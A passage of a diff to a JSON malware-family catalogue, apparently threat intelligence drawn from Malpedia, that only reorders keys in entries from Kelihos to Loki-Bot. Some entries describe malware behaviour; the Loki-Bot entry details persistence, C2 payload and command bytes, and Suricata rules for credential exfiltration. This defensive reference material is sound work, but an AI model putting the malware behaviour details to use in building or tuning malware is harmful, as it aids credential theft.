"7d69892e-d582-4545-8798-4a9a84a821ea", - "value": "Kelihos", - "description": "" + "value": "Kelihos" }, { + "description": "", "meta": { - "synonyms": [ - "TSSL" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy", "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", "https://citizenlab.ca/2016/11/parliament-keyboy/", "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/" - ] + ], + "synonyms": [ + "TSSL" + ], + "type": [] }, "uuid": "28c13455-7f95-40a5-9568-1e8732503507", - "value": "KeyBoy", - "description": "" + "value": "KeyBoy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3", "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", "https://twitter.com/smoothimpact/status/773631684038107136", "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "68039fbe-2eee-4666-b809-32a011e9852a", - "value": "APT3 Keylogger", - "description": "" + "value": "APT3 Keylogger" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble", "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5", - "value": "KEYMARBLE", - "description": "" + "value": "KEYMARBLE" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat", "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047", - "value": "KHRAT", - "description": "" + "value": "KHRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac", "https://www.group-ib.com/resources/threat-research/silence.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f2ca304f-6577-4f3a-983c-beec447a9493", - "value": "Kikothac", - "description": "" + "value": "Kikothac" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027", - "value": "KillDisk", - "description": "" + "value": "KillDisk" }, { + "description": "", "meta": { - "synonyms": [ - "Kasper Internet Non-Security", - "Maple" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins", "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", "https://github.com/nyx0/KINS", "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/", "https://www.youtube.com/watch?v=C-dEOt0GzSE" - ] + ], + "synonyms": [ + "Kasper Internet Non-Security", + "Maple" + ], + "type": [] }, "uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11", - "value": "KINS", - "description": "" + "value": "KINS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://www.morphick.com/resources/news/klrd-keylogger" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "70459959-5a20-482e-b714-2733f5ff310e", - "value": "KLRD", - "description": "" + "value": "KLRD" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", "https://github.com/zerosum0x0/koadic" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6", - "value": "Koadic", - "description": "" + "value": "Koadic" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt", "https://twitter.com/struppigel/status/812726545173401600" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f7674d06-450a-4150-9180-afef94cce53c", - "value": "KokoKrypt", - "description": "" + "value": "KokoKrypt" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni", "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html", "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/", "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf", - "value": "Konni", - "description": "" + "value": "Konni" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9430ce27-c8c5-44fb-9255-47d76a8903b3", - "value": "KoobFace", - "description": "" + "value": "KoobFace" }, { + "description": "", "meta": { - "synonyms": [ - "Bisonal" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia", "https://securitykitten.github.io/2014/11/25/curious-korlia.html", @@ -8622,77 +8622,77 @@ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/", "https://www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf", "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit" - ] + ], + "synonyms": [ + "Bisonal" + ], + "type": [] }, "uuid": "52d98d2f-db62-430d-8658-5cadaeff6cd7", - "value": "Korlia", - "description": "" + "value": "Korlia" }, { + "description": "Kovter is a Police Ransomware\r\n\r\nFeb 2012 - Police Ransomware\r\nAug 2013 - Became AD Fraud\r\nMar 2014 - Ransomware to AD Fraud malware\r\nJune 2014 - Distributed from sweet orange exploit kit\r\nDec 2014 - Run affiliated node\r\nApr 2015 - Spread via fiesta and nuclear pack\r\nMay 2015 - Kovter become fileless\r\n2016 - Malvertising campaign on Chrome and Firefox\r\nJune 2016 - Change in persistence\r\nJuly 2017 - Nemucod and Kovter was packed together\r\nJan 2018 - Cyclance report on Persistence", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter", "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/", "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/", "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "af3a0643-7a80-4b8f-961b-aea18e78715e", - "value": "Kovter", - "description": "Kovter is a Police Ransomware\r\n\r\nFeb 2012 - Police Ransomware\r\nAug 2013 - Became AD Fraud\r\nMar 2014 - Ransomware to AD Fraud malware\r\nJune 2014 - Distributed from sweet orange exploit kit\r\nDec 2014 - Run affiliated node\r\nApr 2015 - Spread via fiesta and nuclear pack\r\nMay 2015 - Kovter become fileless\r\n2016 - Malvertising campaign on Chrome and Firefox\r\nJune 2016 - Change in persistence\r\nJuly 2017 - Nemucod and Kovter was packed together\r\nJan 2018 - Cyclance report on Persistence" + "value": "Kovter" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer", "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b1fe4226-1783-48d4-b1d2-417703a03b3d", - "value": "KPOT Stealer", - "description": "" + "value": "KPOT Stealer" }, { + "description": "", "meta": { - "synonyms": [ - "BlackMoon" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker", "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan", "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf", "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/", "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/" - ] + ], + "synonyms": [ + "BlackMoon" + ], + "type": [] }, "uuid": "f4008c19-e81a-492a-abfe-f177e1ac5bce", - "value": "KrBanker", - "description": "" + "value": "KrBanker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader", "https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c346faf0-9eb4-4f8a-8547-30e6641b8972", - "value": "KrDownloader", - "description": "" + "value": "KrDownloader" }, { + "description": "", "meta": { - "synonyms": [ - "Osiris" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos", "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", @@ -8706,99 +8706,101 @@ "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/" - ] + ], + "synonyms": [ + "Osiris" + ], + "type": [] }, "uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17", - "value": "Kronos", - "description": "" + "value": "Kronos" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8" + ], "synonyms": [ "Barys", "Gofot", "Kuaibpy" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8" - ] + "type": [] }, "uuid": "7d8943a4-b710-48d3-9352-e9b42516d2b7", - "value": "Kuaibu", - "description": "" + "value": "Kuaibu" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f9b3757e-99c7-4999-8b79-87609407f895", - "value": "Kuluoz", - "description": "" + "value": "Kuluoz" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58", - "value": "Kurton", - "description": "" + "value": "Kurton" }, { + "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs", "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3", - "value": "Kwampirs", - "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI." + "value": "Kwampirs" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert", "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", "http://adelmas.com/blog/longhorn.php", "https://www.youtube.com/watch?v=jeLd-gw2bWo" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d", - "value": "Lambert", - "description": "" + "value": "Lambert" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin", "http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0", - "value": "Lamdelin", - "description": "" + "value": "Lamdelin" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot", "http://malware-traffic-analysis.net/2017/04/25/index.html", @@ -8806,131 +8808,131 @@ "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/", "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/", "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0", - "value": "LatentBot", - "description": "" + "value": "LatentBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus", "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", "https://twitter.com/PhysicalDrive0/status/828915536268492800", "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html", "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", - "value": "Lazarus", - "description": "" + "value": "Lazarus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok", "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector", "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72", - "value": "Laziok", - "description": "" + "value": "Laziok" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8faf7592-be5c-44af-b1ca-2bd8caec195d", - "value": "Leash", - "description": "" + "value": "Leash" }, { + "description": "", "meta": { - "synonyms": [ - "shoco" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia", "https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf", "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor.html", "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor-part-2.html" - ] + ], + "synonyms": [ + "shoco" + ], + "type": [] }, "uuid": "41da41aa-0729-428a-8b82-636600f8e230", - "value": "Leouncia", - "description": "" + "value": "Leouncia" }, { + "description": "Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic", "https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/", "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/", "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html", "http://www.malware-traffic-analysis.net/2017/11/02/index.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", - "value": "Lethic", - "description": "Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam." + "value": "Lethic" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b", - "value": "Limitail", - "description": "" + "value": "Limitail" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac", - "value": "Listrix", - "description": "" + "value": "Listrix" }, { + "description": "According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system. \r\n\r\nThe source is on GitHub: https://github.com/zettabithf/LiteHTTP", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp", "https://malware.news/t/recent-litehttp-activities-and-iocs/21053", "https://github.com/zettabithf/LiteHTTP" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8", - "value": "LiteHTTP", - "description": "According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system. \r\n\r\nThe source is on GitHub: https://github.com/zettabithf/LiteHTTP" + "value": "LiteHTTP" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky", "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html", @@ -8941,101 +8943,97 @@ "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "24c9bb9f-1f9a-4e01-95d8-86c51733e11c", - "value": "Locky", - "description": "" + "value": "Locky" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cd55cfa8-1e20-417b-9997-754b600f9f49", - "value": "Locky (Decryptor)", - "description": "" + "value": "Locky (Decryptor)" }, { + "description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2", - "value": "Locky Loader", - "description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky." + "value": "Locky Loader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos", "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/", "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html", "https://www.cyberbit.com/new-lockpos-malware-injection-technique/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872", - "value": "LockPOS", - "description": "" + "value": "LockPOS" }, { + "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.", "meta": { - "synonyms": [ - "Nymeria" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/" - ] + ], + "synonyms": [ + "Nymeria" + ], + "type": [] }, "uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f", - "value": "Loda", - "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented." + "value": "Loda" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.logedrut", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "70cd1eb4-0410-47c6-8817-418380240d85", - "value": "Logedrut", - "description": "" + "value": "Logedrut" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos", "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2789b246-d762-4d38-8cc8-302293e314da", - "value": "LogPOS", - "description": "" + "value": "LogPOS" }, { + "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", "meta": { - "synonyms": [ - "Loki", - "LokiPWS", - "LokiBot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", @@ -9049,16 +9047,20 @@ "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" - ] + ], + "synonyms": [ + "Loki", + "LokiPWS", + "LokiBot" + ], + "type": [] }, "uuid": "b8fa5036-813f-4887-b4d4-bb17b4a7eba0", - "value": "Loki Password Stealer (PWS)", - "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 